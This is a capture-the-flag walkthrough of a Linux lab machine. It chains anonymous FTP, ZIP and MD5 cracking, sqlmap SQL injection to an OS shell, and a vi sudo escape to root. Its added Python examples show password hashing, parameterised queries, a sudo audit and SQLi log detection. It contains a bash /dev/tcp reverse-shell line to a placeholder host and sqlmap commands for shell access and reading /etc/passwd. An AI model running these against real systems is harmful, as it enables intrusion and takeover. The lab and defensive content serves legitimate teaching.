⚠️ Legal Disclaimer: This content is for educational purposes only. Always ensure you have proper authorization before testing

Vaccine is a multi-stage machine that starts with an FTP server containing a password-protected ZIP archive, cracks the archive with John the Ripper, uses the extracted credentials to access a web application, then exploits SQL injection with sqlmap to achieve a shell. Privilege escalation uses a misconfigured sudo rule. This machine ties together credential extraction, automated SQLi, and Linux privesc in a realistic chain.

Tools: nmap · ftp · zip2john · john · sqlmap · sudo  ·  Difficulty: Easy  ·  OS: Linux
01 — What You Will Learn
Skill / Why it matters
ZIP password cracking with zip2john + John: Password-protected archives are common in backup exfiltration scenarios
sqlmap for automated SQL injection: The industry-standard automated SQLi tool — used when manual injection confirms vulnerability
sqlmap OS shell and file read: Escalating from SQLi to OS command execution via sqlmap's built-in features
sudo -l for privilege escalation: Checking what commands a user can run as root is the first privesc check on any Linux host
02 — Reconnaissance
Nmap scan
nmap -sV -sC -p- --min-rate 5000 10.129.x.x
Relevant output
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed
22/tcp open  ssh     OpenSSH 8.0p1
80/tcp open  http    Apache httpd 2.4.41
03 — FTP: Extracting the Archive
Download the ZIP via anonymous FTP
ftp 10.129.x.x
Name: anonymous
ftp> ls
backup.zip
ftp> get backup.zip
ftp> bye
Attempt to unzip — password protected
unzip backup.zip
# Archive: backup.zip requires password
Extract the hash with zip2john
zip2john backup.zip > zip.hash
Crack with John the Ripper
john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt
Output
741852963 (backup.zip)
Extract the archive
unzip backup.zip
# Password: 741852963
# Extracts: index.php, style.css

Inspect index.php — the source code for the web application login. It contains hardcoded database credentials and the password hash for the admin account.

Credentials in index.php
$conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
// Admin hash in the login check: md5($_POST['password']) == "2cb42f8734ea607eefed3b70af13bbd3"
Crack the MD5 hash
# john --stdin reads password candidates from stdin, not hashes, so write the hash to a file first
echo "2cb42f8734ea607eefed3b70af13bbd3" > hash.txt
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
# or use hashcat: hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
# Result: qwerty789
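The login check in index.php compares an unsalted MD5 of the submitted password against a constant, which is why one pass over rockyou.txt recovers it. The following added example (not code from the box or this writeup) contrasts that pattern with the hardened form a developer should ship: a per-user random salt, a slow key-derivation function, and a constant-time comparison. The digest and passwords in it are constructed, not the machine's values.

```python
import hashlib
import hmac
import os

# Constructed stand-in for the hard-coded digest in index.php (not the real value).
LEGACY_MD5_DIGEST = hashlib.md5(b"example-password").hexdigest()


def legacy_check(password):
    """Mirrors the page's pattern: unsalted MD5 compared with a constant.

    The same password always yields the same digest, so precomputed or
    wordlist attacks work against every account at once."""
    return hashlib.md5(password.encode()).hexdigest() == LEGACY_MD5_DIGEST


PBKDF2_ITERATIONS = 210_000  # work factor; raise as hardware permits


def hash_password(password, salt=None):
    """Return a self-describing string: algorithm, iterations, salt and digest."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(stored, password):
    """Recompute the digest with the stored parameters and compare in constant time."""
    try:
        algo, iters, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iters)
    )
    # compare_digest avoids leaking how many leading bytes matched
    return hmac.compare_digest(candidate.hex(), digest_hex)


if __name__ == "__main__":
    record = hash_password("correct horse")
    print(record)
    print("legacy:", legacy_check("example-password"))
    print("hardened:", verify_password(record, "correct horse"), verify_password(record, "wrong"))
```

Note that `hash_password` called twice on the same input gives two different records because of the fresh salt; that is the property the MD5 check lacks.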
04 — Web Application Login

Log in to the web app at http://10.129.x.x/ with admin / qwerty789. The dashboard shows a car search feature with a URL parameter — a clear SQLi candidate.

Vulnerable URL pattern
http://10.129.x.x/dashboard.php?search=a
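The search parameter is injectable because its value is concatenated into the SQL string. The added example below (not code from the box or this writeup) reproduces the defect and its fix side by side against an in-memory SQLite table standing in for carsdb; the car rows are constructed sample data. In the PHP application the equivalent fix is to pass the search term through pg_query_params rather than building the query with string interpolation.

```python
import sqlite3

# Constructed sample rows standing in for the machine's carsdb (not its real schema).
CARS = [
    ("Elixir", "Sports", "2000cc", "PureFuel"),
    ("Sandy", "Sedan", "1000cc", "Electric"),
    ("Meta", "SUV", "800cc", "Hybrid"),
]


def make_db():
    """Build a throwaway database so the two query styles can be compared offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cars (name TEXT, type TEXT, engine TEXT, fuel TEXT)")
    conn.executemany("INSERT INTO cars VALUES (?, ?, ?, ?)", CARS)
    return conn


def search_vulnerable(conn, term):
    """The dashboard.php pattern: the user value becomes part of the SQL syntax."""
    sql = f"SELECT name FROM cars WHERE name LIKE '%{term}%'"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, term):
    """Bound parameter: the driver sends the value separately, so it is never parsed as SQL."""
    sql = "SELECT name FROM cars WHERE name LIKE ?"
    return [row[0] for row in conn.execute(sql, (f"%{term}%",))]


if __name__ == "__main__":
    db = make_db()
    probe = "zzz' OR 1=1 --"  # no car is named zzz, yet the tautology matches everything
    print("normal search     :", search_vulnerable(db, "San"), search_safe(db, "San"))
    print("vulnerable + probe:", search_vulnerable(db, probe))
    print("safe + probe      :", search_safe(db, probe))
```

With the bound parameter, the quote and comment characters in the probe are just bytes inside the LIKE pattern, so the query returns nothing instead of every row.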
05 — SQL Injection with sqlmap

Confirm injection with sqlmap. Provide the authenticated session cookie so sqlmap can access the protected endpoint.

Run sqlmap with session cookie
sqlmap -u "http://10.129.x.x/dashboard.php?search=a" \
  --cookie="PHPSESSID=YOUR_SESSION_ID" \
  --os-shell

sqlmap detects the injection, identifies PostgreSQL as the backend, and drops into an os-shell. Upgrade immediately to a proper reverse shell.

From the sqlmap os-shell, launch a reverse shell
os-shell> bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'
✓ Catch with nc -lvnp 4444. You now have a shell as the postgres user.
06 — sqlmap Reference
Flag / What it does
-u URL: Target URL with injectable parameter
--cookie: Session cookie for authenticated endpoints
--dbs: Enumerate all databases
--tables -D db: List tables in a specific database
--dump -T table -D db: Dump all rows from a table
--os-shell: Drop into an interactive OS shell via SQLi
--file-read /etc/passwd: Read a file from the server filesystem
--level=5 --risk=3: Increase aggressiveness for harder targets
--batch: Suppress prompts — use defaults automatically
--technique=U: Restrict to UNION-based injection only
07 — Privilege Escalation via sudo
Check sudo permissions
sudo -l
User postgres may run the following commands:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf

The postgres user can run vi as root on a specific file. Since vi can spawn a shell from within itself, this is a clean privesc.

Open the file as root via sudo, then escape to shell in vi
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
Inside vi — escape to root shell
:set shell=/bin/bash
:shell
# id
uid=0(root) gid=0(root)
✓ Root shell. Read /root/flag.txt to complete the machine.
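A sudo rule that grants a full-featured editor on one file grants a root shell, as the escape above shows. The added example below (not from the box or this writeup) is a small audit over the text that `sudo -l` prints: it flags rules whose command is an editor or pager that can spawn a shell, and for an editor with a single file argument it proposes the sudoers replacement `sudoedit <file>`, which edits a temporary copy with the editor running as the invoking user and writes the result back as root. The set of escapable programs and the sample `sudo -l` output are assumptions constructed for the check.

```python
import os
import re

# Editors and pagers that can run a shell from inside themselves, so a sudo rule
# on them is effectively a rule for /bin/bash. Illustrative set assumed here;
# vi is the one that matters on this box.
SHELL_ESCAPES = {"vi", "vim", "view", "nano", "less", "more", "man"}
EDITORS = {"vi", "vim", "view", "nano"}

# One command line as printed by `sudo -l`: "(runas) [TAG: ...] /path/cmd [args]".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def audit_sudo_l(output, user="postgres"):
    """Return one finding per risky rule, each with a safer sudoers line."""
    findings = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # header text such as "User postgres may run ..."
        runas = m.group("runas").strip()
        tags = m.group("tags").strip()
        for spec in m.group("cmd").split(","):  # several commands may share a line
            parts = spec.split()
            if not parts:
                continue
            prog = os.path.basename(parts[0])
            if prog not in SHELL_ESCAPES:
                continue
            tag_prefix = f"{tags} " if tags else ""
            if prog in EDITORS and len(parts) == 2:
                # Editor on exactly one file: sudoedit keeps the editor unprivileged.
                fix = f"{user} ALL=({runas}) {tag_prefix}sudoedit {parts[1]}"
            else:
                fix = f"{user} ALL=({runas}) {tag_prefix}/usr/local/sbin/<non-interactive wrapper>"
            findings.append(
                {"program": prog, "runas": runas, "command": spec.strip(), "fix": fix}
            )
    return findings


# Constructed sample matching the rule seen on this machine plus one benign rule.
SAMPLE_SUDO_L = """User postgres may run the following commands:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
    (root) NOPASSWD: /usr/bin/systemctl restart postgresql
"""

if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"RISK {f['runas']}: {f['command']}\n  replace with: {f['fix']}")
```

The systemctl rule passes the check because it cannot open a shell by itself; the vi rule is rewritten to `postgres ALL=(ALL) sudoedit /etc/postgresql/11/main/pg_hba.conf`.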
08 — Key Takeaways
sqlmap's --os-shell goes directly from SQL injection to command execution in a single step — but it leaves significant forensic traces. In a real engagement, manual exploitation is preferable for stealth.
Concept / Real-world relevance
Source code in backup archives: Backup ZIPs on FTP servers regularly contain hardcoded credentials and connection strings
MD5 for password storage: MD5 is not a password hash — it's a checksum. Cracking MD5 passwords takes seconds with rockyou.txt
sqlmap --os-shell: Fastest path from SQLi to shell — but noisy. Manual UNION-based exploitation is more surgical
sudo -l is always step one: Check sudo permissions immediately on every Linux shell — it's the most common privesc path in CTFs and real assessments
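The takeaway that sqlmap is noisy is worth making concrete from the defender's side: its default User-Agent names the tool, and a run against dashboard.php produces a burst of requests from one address whose decoded query strings carry UNION, tautology, time-delay and comment-terminator fragments. The added example below (not from the box or this writeup) parses Apache combined-format access log lines, scores each request on those signals, and reports sources that exceed a burst threshold. The log lines and the pattern set are constructed for the example and are a starting point, not a complete signature list.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, unquote_plus

# Apache combined log format, reduced to the fields this check needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Patterns applied to the URL-decoded query string. Illustrative, not exhaustive.
SQLI_PATTERNS = {
    "union-select": re.compile(r"union(\s|/\*.*?\*/)+(all\s+)?select", re.I),
    "boolean-tautology": re.compile(r"['\")]\s*(or|and)\s+['\"]?\w+['\"]?\s*=\s*['\"]?\w+", re.I),
    "time-delay": re.compile(r"(pg_)?sleep\s*\(", re.I),
    "comment-terminator": re.compile(r"(--|#|/\*)\s*$"),
}


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """List the reasons a parsed request looks like automated SQL injection."""
    reasons = []
    if "sqlmap" in entry["ua"].lower():
        reasons.append("user-agent:sqlmap")
    query = unquote_plus(urlsplit(entry["target"]).query)
    for name, pattern in SQLI_PATTERNS.items():
        if pattern.search(query):
            reasons.append("payload:" + name)
    return reasons


def analyze(lines, burst_threshold=5):
    """Flag suspicious requests and the source IPs that sent at least burst_threshold of them."""
    findings = []
    hits_per_ip = Counter()
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            hits_per_ip[entry["ip"]] += 1
            findings.append({"ip": entry["ip"], "ts": entry["ts"],
                             "target": entry["target"], "reasons": reasons})
    bursts = {ip: n for ip, n in hits_per_ip.items() if n >= burst_threshold}
    return {"findings": findings, "burst_sources": bursts}


# Constructed log sample: one ordinary search, then a short automated run.
_PROBES = [
    "a%27%20AND%201%3D1%20--%20",
    "a%27%20AND%201%3D2%20--%20",
    "a%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%20--%20",
    "a%27%20AND%20%28SELECT%20pg_sleep%285%29%29%20IS%20NULL%20--%20",
    "a%22%20OR%20%221%22%3D%221",
]
SAMPLE_LOG = [
    '10.10.14.5 - - [10/Mar/2024:12:00:01 +0000] "GET /dashboard.php?search=Sandy HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
] + [
    f'10.10.14.9 - - [10/Mar/2024:12:01:{i:02d} +0000] "GET /dashboard.php?search={p} HTTP/1.1" 200 1532 "-" "sqlmap/1.7.2 (https://sqlmap.org)"'
    for i, p in enumerate(_PROBES)
]

if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for f in result["findings"]:
        print(f["ts"], f["ip"], ", ".join(f["reasons"]))
    print("burst sources:", result["burst_sources"])
```

Matching on the User-Agent alone is brittle because the header is trivially changed; the payload patterns and the per-source request volume are what survive that, which is why the check scores all three.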
